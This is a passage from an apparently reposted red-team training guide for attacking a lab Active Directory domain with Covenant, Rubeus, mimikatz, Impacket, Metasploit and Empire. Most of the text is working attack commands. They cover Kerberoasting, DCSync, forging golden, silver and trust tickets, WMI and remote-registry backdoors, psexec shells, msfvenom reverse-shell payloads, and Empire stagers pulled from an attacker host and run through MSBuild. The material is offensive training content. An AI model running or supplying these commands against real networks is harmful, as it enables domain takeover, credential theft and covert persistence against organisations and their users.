The same method, "Assembly" task, has already

been used to load the SharpHound tool.

https://github.com/BloodHoundAD/BloodHound/tree/m
aster/Ingestors

After moving it to attacker's Kali machine it can

be loaded as input to the Assembly task.

After a short while the output can be seen in the

tasking tab.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

ASREPRoasting and Kerberoasting with Covenant

Before we jump into actual Roasting, let us show
you also how these misconfigurations arise.

We created two domain accounts with crackable

passwords.

net user service_user Welcome1! /add /domain

net user service_user2 Welcome8! /add /domain

For that domain admin access is required.

Next, SPNs are created for these users.

For the purpose of later kerberoasting, we will

create a SPN for service_user.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

setspn -U -S http/win10-web service_user

For the purpose of later ASREP-roasting, let's go

to ADUC (Active Directory Users and Computers)

And choose "Users"

Then find service_user2, right-click it and

choose "properties". Under "account" tab, choose
"Do not require Kerberos preauthentication"

This way, we have introduced two

misconfigurations into our environment. Note,
that while ASREP can be considered an account

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

misconfiguration, the main issue here is the weak

password. If machine accounts were used for
SPN's, which have a complex, random and long
password are typically not crackable using usual
GPUs.

Note: This exercise is done using a Medium

integrity grunt of Analyst1 user.

First, let's execute

Rubeus kerberoast /format:hashcat

A hash has been received in the output. Let's see

if hashcat can handle it:

We save it to a text file and remove all newlines

and whitespaces.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Later on we can use hashcat to crack the obtained

hash.

In that case we already knew what kind of

password we can expect, thus a precise mask
attack cracked the password within seconds. In a
real-life scenario we need to be lucky or utilize
some hints to successfully crack user's password.

A similar technique works with ASREP-roasting.

Go to interact and issue a command

Rubeus asreproast /format:hashcat

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Then we can strip all the spaces and newlines and

prepare file for cracking.

hashcat64.exe -m 18200 service_user2 -O -a 3

?u?l?l?l?l?l?l?d?s

If you don't have a really strong GPU available,

that one will not give up so easily. The same

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

mask attack on the same GPU took 6 hours to

complete.

In the case of a retrieved ASREP hash, you should

count on a very weak password or have a good
wordlist.

Based on the previous password, we were able to

create a simple wordlist where just the number
changes.

However, in a real-life scenario, you should also

retrieve some hints about the password or invest
in a serious (like cloud-based) GPU.

Domain persistence with Golden Ticket

Golden ticket is a very popular technique, so you
might want to try it. First, we need the krbtgt
account's NTLM hash. We can obtain this using

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

DCSync. Covenant has a dedicated Task for that

one:

(Domain Administrator user grunt on Jumpbox)

After a short while task is completed and we can

get the krbtgt hash:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's now try to craft a golden ticket out of it

and try to inject it into memory. We will need to
use a local instance of mimikatz in order to
generate the ticket. As already explained, a
golden ticket is generated using domain SID,
krbtgt NTLM hash and the domain name along with
desired user ID.

The command we use is

kerberos::golden
/sid:S-1-5-21-23589937-599888933-351157107
/domain:els-child.els.local
/rc4:e4ba51c7157fe46652603b661f1ccfbe
/user:Administrator /id:500 /file:ticket.kirbi

As ticket.kirbi is generated we can copy it into

our Kali machine. Then, we upload it using Upload
task as c:\users\analyst1\ticket.kirbi

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Then, we read this ticket as base64 using

powershell and inject it using Rubeus which is
built-in into Covenant, as follows.

powershell
[System.Convert]::ToBase64String([System.IO.File]
::ReadAllBytes("c:\users\analyst1\ticket.kirbi"))

Then, we use the output with a command:

rubeus ptt /ticket:doQA[base64]

After importing the ticket, you should be able to

confirm it has been imported using klist.exe.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We can recognize the golden ticket primarily by

its overly long time to live. Let's see if that
works by listing the c$ share of domain
controller:

We have now obtained effective DA permissions

using the golden ticket.

We can also use again domain admin credentials in

order to move laterally to a Domain Controller.
As long as we have the cleartext password we can
use the WMIGrunt task to conveniently spawn a new
grunt from a machine to which we have access with
our credentials.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Shortly after running that task we obtain another

connection from the DC.

Golden ticket and DCSync with Covenant

(Refresher)
Golden ticket allows you to get a "free entry"
ticket to any domain service. Although golden
tickets should be considered rather opsec-unsafe
(More and more tools are able to detect it),
there might be still numerous scenarios when you
want to utilize them.

Before you can forge a Golden ticket, you need to

obtain krbtgt user's hash.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

To do so, we need to compromise a domain

administrator account or domain controller.

● In case of a domain controller compromise we

can pull all hashes with Mimikatz

● In case of a domain administrator compromise

we can use DCSync

With a Domain Administrator grunt on Jumpbox, we

can try the DCSync way.

Let's obtain the domain's FQDN in order to

proceed, as above. We can then use Covenant
DCSync from Interact tab. With following syntax:

DCSync ELS-CHILD\krbtgt els-child.eLS.local

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As we have the hash, we also require the domain

SID in order to craft a Golden Ticket:

We can obtain it using the command:

whoami /user

S-1-5-21-23589937-599888933-351157107-500

We need the string without its last part.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

In order to craft the golden ticket stealthily,

you need to run mimikatz locally first and then
inject the ticket to your compromised machine.

mimikatz.exe

# kerberos::golden /user:Administrator
/domain:els-child.eLS.local
/sid:S-1-5-21-23589937-599888933-351157107
/krbtgt:e4ba51c7157fe46652603b661f1ccfbe
/ticket:golden.kirbi

As the above step is just a computation to create

proper ticket, it can be performed on an external
local machine.

The file can be then transferred to the attacker

(covenant) machine and distributed to victim
machines to gain effective permissions of a
domain admin using the golden ticket.

The ticket can be hosted e.g. using

simplehttpserver and downloaded using

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

powershell curl
http://10.100.10.2:9090/golden.kirbi -outfile
golden.kirbi

You can also use Covenant's Download

functionality.

In order to inject it into memory, you can use

command

Rubeus ptt
/ticket:"c:\users\adminels\golden.kirbi"

Maintaining access without a golden ticket

Golden ticket is a well known technique, which
also means it is a less stealthy one. In order to
be a little more stealthy upon obtaining access
to the Domain Controller, one might want to use
some more obscure ways of maintaining DA access.
For example, we can use one of the tools
belonging to the Nishang project, named
Set-RemoteWMI.

https://github.com/samratashok/nishang/blob/maste
r/Backdoors/Set-RemoteWMI.ps1

This tool allows to set a WMI-remoting based

backdoor. Let's see how we can use it with
Covenant.

First, we download the tool in our Kali machine.

You can do it using wget, git clone or any other
way.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Next, we interact with the Domain Admin grunt

from the Domain Controller. The first thing to do
is to import the downloaded powershell module.

Next, we would like to maintain access from the

domain user we compromised -- analyst1.

powershell Set-RemoteWMI -UserNAme analyst1

-ComputerName child-dc01.els-child.els.local
-namespace 'root\cimv2' -Verbose

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now, in order to check if we can access DC we

switch to an Analyst1 grunt and issue following
command:

powershell gwmi -class win32_operatingsystem

-Computername child-dc01.els-child.els.local

The gwmi instruction is alias for Get-WmiObject.

Silver tickets
A less powerful but still effective technique is
crafting a Silver ticket.

While a golden ticket is a domain-wide pass, a

silver ticket's scope is limited to a single
computer.

Also, the difference from a Golden Ticket is that

we need to obtain the computer's Machine account
hash. Machine account hashes are rather
uncrackable due to the machine account password

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

being a random 120+ bytes long string. A silver

ticket is a good way of utilizing obtained
Machine account hashes.

We can also prepare a silver ticket locally and

then utilize it by injecting it into the target
machine's memory. The domain and sid values are
obtained as in the case of golden tickets - by
examining any domain account.

mimikatz.exe

kerberos::golden /user:Administrator
/domain:els-child.eLS.local
/sid:S-1-5-21-23589937-599888933-351157107
/rc4:[machine hash] /service:cifs
/ticket:silver.kirbi

In the above case, the ticket will allow

administrative access to CIFS (File sharing, SMB)
service.

In this case we use the cifs service, but other

services can be used as well. The uppercase names
below are service names to be used with the
/service: argument

HOST, RPCSS - for WMI interactions

HOST for Schtasks

LDAP for LDAP including DCsync attack

HOST, HTTP for WinRM

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

HOST, HTTP, WSMAN, RPCSS - for PowerShell

Remoting

We will use silver tickets in the next task -

Remote registry backdoor.

Remote registry backdoor

Another way of maintaining access to the machine
is to create a Remote Registry backdoor. Another
great tool can be utilized in order to achieve
it:

https://github.com/HarmJ0y/DAMP

The DAMP project allows to create a backdoor

based on security descriptors to certain critical
services. This way, we can, for example, create a
Remote Registry backdoor.

We start with our DC grunt and import the PS

module.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

powershell Add-RemoteRegBackdoor -ComputerName

child-dc01.els-child.els.local -Trustee analyst1
-verbose

Then the command is invoked using the interact

tab:

Now, we move to the Analyst1 grunt and import the

RemoteHashRetrieval module

In next step we are able to obtain the Machine

Account hash.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Obtaining the machine hash account is important,

because this hash can in turn be used to create a
silver ticket to any service on host child-dc01
with any permissions. Going this way, we can also
use that access to obtain administrative
permissions on e.g. remoting-like services by
forging a silver ticket based on machine
account's hash.

In order to use WMI remoting, we require ticket

for both HOST and RPCSS service. Let's use that
hash to create two tickets in a local Mimikatz
instance:

kerberos::golden /domain:els-child.els.local
/sid:S-1-5-21-23589937-599888933-351157107
/target:child-dc01.els-child.els.local
/service:HOST
/rc4:61840587fd2e77b5f0509ae41e40363e
/user:Administrator

kerberos::golden /domain:els-child.els.local
/sid:S-1-5-21-23589937-599888933-351157107
/target:child-dc01.els-child.els.local
/service:RPCSS

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

/rc4:61840587fd2e77b5f0509ae41e40363e
/user:Administrator

Both tickets are uploaded to the target machine

(in that case, Jumpbox). Then, we import them one
by one using Rubeus.

powershell
[System.Convert]::ToBase64String([System.IO.File]
::ReadAllBytes("c:\users\analyst1\ticket2.kirbi")
)

Rubeus ptt /ticket:doQAAAW1M…

As the tickets are imported, you can see the

final result a simple interaction with the target
DC machine.

Attacking trusts
Domains together can be part of larger
organizational units named forests. These can be
applied in large enterprises, where, for example,
each national office has its own domain. Apart
from forests, standalone domains can also
establish a relationship between them without

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

becoming an organized structure. Domains can also

establish a parent-child relationship. These
relationships are called trusts and their purpose
is to define and enforce an access control logic
between these domains.

Using a trust, it is possible to allow users of

one domain to interact with objects belonging to
another domain and vice versa. The trust
relationship can be as follows:

● Bidirectional (two way) trust - both domains

respect each other permissions

● One way trust - one domain is privileged over

the second one

These relationships can also be applied to whole

forests.

Once a parent and child domains are joined

together, they are automatically establishing a
two way trust. Let's see how we can exploit this
fact once a DC is compromised using Covenant.

We start from a Domain Administrator grunt (on

child-dc01) and we type:

powershell Get-ADTrust -Filter *

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We can see that the current domain has a

bidirectional trust relationship with the domain
els.local. In order to create a trust-abusing
golden ticket, which will be respected by the
trusting domain, we need the same information as
for normal golden tickets plus the els.local's
domain SID. Let's obtain all needed information:

For eLS.local SID, import PowerView and run the

Get-DomainSID command.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Also, we need SID of current domain which can be

obtained via whoami /user

The krbtgt hash can be obtained using DCSync.

Now, we use a local instance of mimikatz to

generate the golden trust-abusing ticket. The
command used is:

mimikatz.exe

kerberos::golden /admin:Administrator
/domain:els-child.eLS.local
/sid:S-1-5-21-23589937-599888933-351157017
/sids:S-1-5-21-2128511948-1856962338-1523442862-5

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

00 /krbtgt:e4ba51c7157fe46652603b661f1ccfbe
/startoffset:0 /endin:600 /renewmax:10080

As a result of that action a file ticket.kirbi

will be created. We will now move it to our Kali
machine and upload to compromised grunt using the
Upload task:

As the ticket is imported, we will use the

built-in Rubeus module to import it into memory.

Before we do that, we need to convert the ticket

to base64 in order for Rubeus to be able to parse
it.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

If you try to simply encode the ticket using

Kali, Rubeus might have trouble parsing it. Due
to that, better do it from powershell as shown
below. Use the command:

powershell
[System.Convert]::ToBase64String([System.IO.File]
::ReadAllBytes("ticket.kirbi"))

Then, copy the result output and use it with

Rubeus:

Rubeus ptt /ticket:[base64]

As the action is completed, you can check if the

ticket is imported using klist.exe:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

As the action is completed, you can try to access

the parent domain controller

You have now effective domain admin privileges in

the parent domain as domain.

Forging trust ticket with Impacket

There is an alternative way for crafting a trust
ticket using the Impacket Toolkit, which can be
downloaded from GitHub:

https://github.com/SecureAuthCorp/impacket

Knowing a plaintext password is required to

perform that exercise. However, looking into
Covenant reminds us that the password has already
been harvested using Mimikatz:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Moreover, we add the domain's FQDN to kali's

/etc/hosts file:

Then we can use lookupsid.py and secretsdump.py

to gather interesting information from the target
DC system.

The commands used are:

python ./examples/lookupsid.py
ELS-CHILD/Administrator:Admin\@3L\$-CHILDL0c\@l**
***@child-dc01.els-child.eLS.local

python ./examples/secretsdump.py
ELS-CHILD/Administrator:Admin\@3L\$-CHILDL0c\@l**
***@child-dc01.els-child.eLS.local

Note, that special characters (@ and $) had to be

escaped.

The tools successfully retrieve the requested

information.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Also, we will need some assistance from covenant

in order to retrieve the parent domain SID. We
will do it in the same way as previously:

Now, we will use ticketer.py in order to interact

with the target domain.

We will use the same information to create a

golden ticket, but this time, we will use
impacket components - ticketer.py and
ticketConvert.py in order to create the
trust-abusing golden ticket.

You can find these scripts by default in the

impacket/examples/ directory.

First, we create the ticket using the command:

ticketer.py -nthash
e4ba51c7157fe46652603b661f1ccfbe -domain-sid
S-1-5-21-23589937-599888933-351157107 -domain
els-child.els.local Administrator -extra-sid
S-1-5-21-2128511948-1856962338-1523442862-500

Note that it is very similar to mimikatz command.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We can observe that a .ccache (Kerberos Cache)

file has been created. We cannot however use that
file yet.

We need ticketConverter.py in order to turn it

into .kirbi file with simple command:

We can now use that file in the same way as the

one generated by mimikatz. First, we upload the
admin.kirbi to target machine:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Then inside Covenant we can use the same

technique to pass the ticket to memory using the
built-in Rubeus module:

powershell
[System.Convert]::ToBase64String([System.IO.File]
::ReadAllBytes("admin.kirbi"))

After that, you will be able to access the parent

domain controller.

You can also use the .ccache file to execute code

directly on the child domain controller.

First, you need to make sure that you have proper

entries in /etc/hosts that will point the
ELS-CHILD domain to the proper IP address.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Also, you need to put location of .ccache file

into an environment variable:

export
KRB5CCNAME=/root/impacket/examples/Administrator.
ccache

you might also need to synchronize the time

between your kali and remote dc. Use

ntpdate 10.100.10.253

./psexec.py -dc-ip child-dc01.ELS-CHILD.ELS.LOCAL

ELS-CHILD.ELS.LOCAL/Administrator@child-dc01.ELS-
CHILD.ELS.LOCAL -k -no-pass -debug

You will be able to obtain a remote shell from

child dc using Kerberos authentication and the
.ccache file you generated.

The same effect can be achieved using wmiexec

./wmiexec.py -dc-ip
child-dc01.ELS-CHILD.ELS.LOCAL
ELS-CHILD.ELS.LOCAL/Administrator@child-dc01.ELS-
CHILD.ELS.LOCAL -k -no-pass -debug

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

PIVOTING AND LATERAL MOVEMENT

FROM HTTP NTLM Relay to DC Access
Our starting point will be remote desktop on
WIN10-WEB with CLM turned off.

We will re-use the credentials of

ELS-CHILD\VICTIM to interact with the win10-web
machine and hook it with Metasploit and empire.
First, empire is downloaded from its repository:

https://github.com/BC-SECURITY/Empire/releases
(We used 3.1.5)

In order to install and run it we use the

following commands on our Kali machine:

apt-get install autoconf

tar -xzfv empire.tar.gz

cd setup && ./install

cd ../

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

./empire

Then, the Metasploit framework is launched.

Compromise win10-web using any Metasploit stager
you want. For example,

systemctl start postgresql

msfconsole

msfdbinit

use exploit/multi/handler

set lhost 10.100.10.2

set lport 8443

set payload windows/x64/meterpreter/reverse_tcp

run

Payload is generated:

msfvenom -p windows/x64/meterpreter/reverse_tcp
lhost=10.100.10.2 lport=8443 exitfunc=thread -f
exe -o m.exe

Once run on the target machine, we can start to

set up route for another subnet. Don't forget to
use proper session ID.

meterpreter > run autoroute -s 10.100.11.0/24

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Before moving deeper, we can also use the

Get-BrowserData.ps1 script in order to get some
information about the recently visited websites.

https://github.com/rvrsh3ll/Misc-Powershell-Scrip
ts/blob/master/Get-BrowserData.ps1

In order to do that, we transfer the script to

the remote machine and invoke it in the
meterpreter shell.

Let's try to hunt for some NetNTLM hashses using

Inveigh. The identified website is in another
subnet, we might need to perform some pivoting.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

In order to check if anyone is trying to

authenticate to that website, we can launch
Invoke-Inveigh which is a powershell-based
responder implementation:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

The script can be downloaded from GitHub:

https://github.com/Hackplayers/Empire-mod-Hpys-te
sts/blob/master/data/module_source/collection/Inv
oke-Inveigh.ps1 and then transferred and executed
on win10-web using the commands:

. .\Invoke-Inveigh.ps1

Invoke-Inveigh -ConsoleOutput Y

As we can see, there are authentication requests.

Let's go back to the attacker machine and try to
compromise the identified website's
authentication by relaying the authentication
attempts Inveigh spotted. Essentially we will try
to perform HTTP NetNTLM relaying against the
website authentication.

To do that, we will have to use portproxy to set

up port proxying on the win10-web machine.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

use post/windows/manage/portproxy

set CONNECT_ADDRESS 10.100.10.2

set CONNECT_PORT 80

set LOCAL_ADDRESS 10.100.11.101

set LOCAL_PORT 80

set session 1

run

Another step will be to create the http relay

server:

use auxiliary/server/http_ntlmrelay

set RHOST 10.100.11.102

set RURIPATH /admin/default.aspx

set URIPATH /

set SRVHOST 10.100.10.102

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

set SRVPORT 80

run

We need to pass the session to Empire now. We can

perform session passing, by transfering a
msbuild-based Empire launcher and executing it
from inside our meterpreter session.

Uselistener http

(Empire: listeners/http) > set BindIP 10.100.10.2

(Empire: listeners/http) > set Name 10.100.10.2

(Empire: listeners/http) > set Port 9090

(Empire: listeners/http) > execute

Then execute the following commands in Empire:

usestager windows/launcher_xml

set Listener http

set OutFile /root/z.xml

And inside the meterpreter session:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

powershell curl http://10.100.10.2:8888/z.xml

-outfile z.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\M
SBuild.exe c:\users\admin\z.xml

The new Empire agent should appear.

Now we will use inveigh from inside Empire.

Agents

Interact [ID]

usemodule collection/inveigh

(Empire: powershell/collection/inveigh) > set SMB

Y

(Empire: powershell/collection/inveigh) > set

LLMNR Y

(Empire: powershell/collection/inveigh) > set

NBNS Y

(Empire: powershell/collection/inveigh) > set

Proxy Y

(Empire: powershell/collection/inveigh) > set IP

10.100.11.101

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

